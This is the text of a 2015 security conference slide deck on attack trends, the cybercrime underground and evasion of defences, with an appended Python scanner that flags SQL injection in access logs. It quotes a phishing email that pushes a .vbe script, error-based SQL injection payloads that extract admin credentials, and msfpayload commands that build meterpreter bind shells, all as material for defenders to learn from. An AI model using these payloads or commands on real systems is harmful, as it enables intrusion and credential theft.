ATTACKS LIES AND THE UNDERGROUND WORLD
BERLIN 02.11.2015<br />
Speaker: Andrea Pompili<br />
<strong>ATTACKS</strong>, <strong>LIES</strong> <strong>AND</strong><br />
<strong>THE</strong> <strong>UNDERGROUND</strong> <strong>WORLD</strong><br />
There are only 10 types<br />
of people in the world:<br />
Those who understand binary,<br />
and those who don't<br />
Except where otherwise noted, this work is licensed under<br />
http://creativecommons.org/licenses/by-nc-sa/3.0/<br />
Andrea Pompili<br />
apompili@hotmail.com – Xilogic Corp.
> Full Remediation and Hardening done one year ago<br />
> Operating Systems patched to the latest available version<br />
> Full Logging of all the Site’s activities<br />
> 2 IPS Systems (Intrusion Prevention System) in cascade<br />
[Chart: Overall Attacks detected since 2009. The extracted values (three series per year, each year summing to 100%) have lost their axis and series labels and are not reproduced here.]<br />
Source: OAI (Osservatorio sugli Attacchi Informatici in Italia) “OAI Report 2015”<br />
[Chart: Detected Attack impacts 2013/2014. The extracted values (four impact categories compared across the two years) have lost their labels and are not reproduced here.]<br />
Source: OAI (Osservatorio sugli Attacchi Informatici in Italia) “OAI Report 2015”<br />
«The purpose of this report is not detailing the results of the survey, but analyzing the data related to the average of the whole sample, we can establish that the results are:<br />
• quite good for the logical security;<br />
• very good for the infrastructure security;<br />
• good for the security related to services;<br />
• to be improved for organizational security.»<br />
«We can say that we expected this»<br />
Russian Business Network<br />
ShadowCrew<br />
Avalanche<br />
Legion of Doom<br />
DarkMarket<br />
Masters of Deception<br />
Anton Gelonkin<br />
Leo Kuvayev<br />
The Silk Road<br />
CyberVor<br />
Sheep Marketplace<br />
Black Market Reloaded<br />
Evolution<br />
The Farmer’s Market<br />
Agora<br />
AlphaBay Market<br />
Lizard Squad<br />
419 Nigerian Scam<br />
Chinese Underground Market<br />
Source: Havocscope «Prices of Computer Hackers and Online Fraud»<br />
http://www.forbes.com/sites/andygreenberg/2012/03/23/shopping-for-zero-days-an-price-list-for-hackers-secret-software-exploits/<br />
Saturday, July 19, 1986<br />
Hacker Taps into Paris Computer Used in Space Study<br />
PARIS — A hacker broke into sections of a powerful American-built computer that is used in French aerospace and other government research, officials said Friday. Jean-Claude Adan, deputy director of a Paris research center equipped with the advanced, $10-million Cray-1 computer, said the intruder cracked a computer entry code on March 30.<br />
He said a special inquiry showed that the break-in lasted up to four hours and had probably been achieved with an ordinary home or office terminal hooked to the center by phone.<br />
The center, which handles work for the National Office of Aerospace Research and other government bodies, is considering taking legal action. There was no immediate comment from Cray Research, based in Minneapolis.<br />
Adan said that tracing the culprit, thought to be a skilled technician familiar with the Cray system, was extremely difficult because of the large number of home terminals.<br />
http://www.infosecblog.org/2013/01/you-are-the-target/hackedpc2012/<br />
(*) According to Frank Rieger<br />
Chief technology officer at GSMK<br />
Source: Vincenzo Iozzo – OWASP Day 2012<br />
So, how does one get full remote code execution in Chrome? In the case of Pinkie Pie’s exploit, it took a chain of Six Different Bugs in order to successfully break out of the Chrome sandbox.<br />
(http://blog.chromium.org/2012/05/tale-of-two-pwnies-part-1.html)<br />
Last year (2011), VUPEN released a video to demonstrate a successful sandbox escape against Chrome but Google challenged the validity of that hack, claiming it exploited third-party code, believed to be the Adobe Flash plugin.<br />
(http://www.zdnet.com/blog/security/pwn2own-2012-google-chrome-browser-sandbox-first-to-fall/10588)<br />
Blackhole Exploit Kit<br />
Neutrino<br />
http://trailofbits.files.wordpress.com/2011/08/attacker-math.pdf<br />
From: hdesk@rcs.it<br />
Sent: Thursday, November 04, 2004 7:48 PM<br />
To: xxxxxx@rcs.it<br />
Subject: Configuration Update<br />
Good morning,<br />
you’re receiving this email because we’ve detected some troubles in your email account. These seems related<br />
to an uncorrect configuration of Your computer that need to be updated.<br />
Please connect to the following address to begin the update process:<br />
http://xxxx.rcs.it/software/av/index.html<br />
Please execute the auto-configuration script Configuration.vbe, which link is available at the intranet page<br />
specified above. Once the configuration has been concluded, a confirmation message will be prompted<br />
specifying the positive update execution.<br />
Kind Regards<br />
Help Desk – RCS Technical Support Team<br />
RCS Editori S.p.A.<br />
Configuration has been correctly updated, thanks for collaboration<br />
173.254.216.69 - - [13/Nov/2012:20:03:35 +0100]<br />
"GET /index.php?id=2501&tx_wfqbe_pi1[uid]=1+order+by+1000+--+ HTTP/1.0"<br />
178.32.211.140 - - [13/Nov/2012:20:03:43 +0100]<br />
"GET /index.php?id=2501&tx_wfqbe_pi1[uid]=<br />
1+and(/*!select*/+1+/*!from*/ (/*!select*/+count(*),concat_ws(0x3a,<br />
substring((concat_ws(0x3b,user(),version(),database(),repeat(0x00,100))),1,64),<br />
floor(rand(0)*2))x+/*!from*/+/*!information_schema*/.tables+group+by+x)a)+--+"<br />
89.253.105.39 - - [15/Nov/2012:12:32:14 +0100]<br />
"GET /some_path/some_file.html?tx_wfqbe_pi1[uid]=<br />
11502+and(select+1+from(select+count(*),concat_ws(0x3a,<br />
substring((SELECT+binary(concat(concat_ws(0x3a,username,password,admin),<br />
repeat(0x00,100)))+FROM+be_users+WHERE+admin=1+LIMIT+1,1),1,64),floor(<br />
rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+"<br />
"Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.10"<br />
Web Shell Extension<br />
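The three access-log entries above show the progression a defender should learn to read: an `order by 1000` column-count probe, then an error-based extraction that hides its keywords inside MySQL "versioned" comments (`/*!select*/`, `/*!information_schema*/`) so that a signature looking for plain `select ... from information_schema` never fires, and finally a plain-text query against the `be_users` table. The example below is added here and is not part of the slides: a small Python scanner that parses Apache-style access-log lines, decodes the query string, strips the versioned-comment wrapper before matching, and reports which indicators each parameter triggered. The log lines are constructed after the ones on the slides (re-joined onto single lines, with a benign request added for contrast), and the indicator names and regular expressions are my own assumptions, not a signature set from any product.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample log, modelled on the slides' entries (re-joined onto
# single lines) plus one benign request so the benign path is exercised.
SAMPLE_LOG = [
    '10.0.0.5 - - [13/Nov/2012:20:01:00 +0100] "GET /index.php?id=2501&tx_wfqbe_pi1[uid]=1 HTTP/1.1"',
    '173.254.216.69 - - [13/Nov/2012:20:03:35 +0100] "GET /index.php?id=2501&tx_wfqbe_pi1[uid]=1+order+by+1000+--+ HTTP/1.0"',
    '178.32.211.140 - - [13/Nov/2012:20:03:43 +0100] "GET /index.php?id=2501&tx_wfqbe_pi1[uid]=1+and(/*!select*/+1+/*!from*/(/*!select*/+count(*),concat_ws(0x3a,substring((concat_ws(0x3b,user(),version(),database(),repeat(0x00,100))),1,64),floor(rand(0)*2))x+/*!from*/+/*!information_schema*/.tables+group+by+x)a)+--+ HTTP/1.0"',
    '89.253.105.39 - - [15/Nov/2012:12:32:14 +0100] "GET /some_path/some_file.html?tx_wfqbe_pi1[uid]=11502+and(select+1+from(select+count(*),concat_ws(0x3a,substring((SELECT+binary(concat(concat_ws(0x3a,username,password,admin),repeat(0x00,100)))+FROM+be_users+WHERE+admin=1+LIMIT+1,1),1,64),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+ HTTP/1.1" "Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.10"',
]

# Apache-style request line; the trailing part (status, bytes, referer, UA)
# is captured loosely because the slides' excerpts omit most of it.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: HTTP/[\d.]+)?"(?P<rest>.*)$'
)

# MySQL versioned comment: /*!select*/ is executed as "select" by MySQL,
# so a matcher must unwrap it before looking for keywords.
VERSIONED_COMMENT_RE = re.compile(r'/\*!\s*(.*?)\s*\*/')

# Heuristic indicators (assumed names/patterns, not a vendor signature set).
INDICATORS = {
    "order_by_probe": re.compile(r'\border\s+by\s+\d+'),
    "information_schema": re.compile(r'\binformation_schema\s*\.'),
    "error_based_floor_rand": re.compile(r'\bfloor\s*\(\s*rand\s*\(\s*\d*\s*\)\s*\*\s*2\s*\)'),
    "group_by_alias": re.compile(r'\bgroup\s+by\s+\w+'),
    "comment_terminator": re.compile(r'(?:--|#)\s*$'),
    "be_users_table": re.compile(r'\bfrom\s+be_users\b'),
}


def normalize_sql(value):
    """Unwrap versioned comments, collapse whitespace, lowercase."""
    text = VERSIONED_COMMENT_RE.sub(r' \1 ', value)
    return re.sub(r'\s+', ' ', text).strip().lower()


def parse_line(line):
    """Split one log line into ip, timestamp, path, decoded params, UA."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m.group('target').partition('?')
    quoted = re.findall(r'"([^"]*)"', m.group('rest'))
    return {
        'ip': m.group('ip'),
        'ts': m.group('ts'),
        'method': m.group('method'),
        'path': path,
        # parse_qsl decodes '+' and %xx once; no second decode is applied.
        'params': dict(parse_qsl(query, keep_blank_values=True)),
        'ua': quoted[-1] if quoted else None,
    }


def analyze(line):
    """Return the parsed record plus a per-parameter list of indicator hits."""
    rec = parse_line(line)
    if rec is None:
        return None
    hits = {}
    for name, raw in rec['params'].items():
        normalized = normalize_sql(raw)
        matched = [ind for ind, rx in INDICATORS.items() if rx.search(normalized)]
        if matched:
            hits[name] = matched
    rec['hits'] = hits
    return rec


def scan(lines):
    """Return only the records with at least one indicator hit."""
    findings = []
    for line in lines:
        rec = analyze(line)
        if rec and rec['hits']:
            findings.append(rec)
    return findings


if __name__ == '__main__':
    for f in scan(SAMPLE_LOG):
        print(f['ip'], f['ts'], f['path'])
        for param, inds in f['hits'].items():
            print('   ', param, '->', ', '.join(inds))
```

Running the block prints one finding per hostile request, with the benign request filtered out. The part worth keeping is `normalize_sql`: the second request on the slide contains no literal `select ... from information_schema` sequence until the `/*!...*/` wrappers are removed, which is exactly why a pattern matcher that works on the raw string misses it while the database executes it.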
http://evader.stonesoft.com/<br />
http://insecure.org/stf/secnet_ids/secnet_ids.html<br />
msfpayload windows/meterpreter/bind_tcp X > moca_x86_tcp_4444.exe<br />
msfpayload windows/x64/meterpreter/bind_tcp X > moca_x64_tcp_4444.exe<br />
“The truth is, consumer-grade antivirus products can’t protect against targeted malware created by well-resourced nation-states with bulging budgets. They can protect you against run-of-the-mill malware: banking trojans, keystroke loggers and e-mail worms. But targeted attacks like these go to great lengths to avoid antivirus products on purpose”<br />
> Think like an Attacker, so that you can understand what they’ll do and how they will attack<br />
> Try to understand their targets and their abilities, but above all the operational constraints they have<br />
> Identify the «perceived» value of the things you want to protect but, most importantly, what you want to protect<br />
> Work on the whole defense perimeter, without any act of faith<br />
> If your defense is cheaper than the attack, you’ll always be in the lead<br />
Questions? (English)<br />
¿Preguntas? (Spanish)<br />
مَطَالِب أَيَّة (Arabic)<br />
Ερωτήσεις? (Greek)<br />
Domande? (Italian)<br />
вопросы? (Russian)<br />
Sindarin<br />
tupoQghachmey (Klingon)<br />
Japanese<br />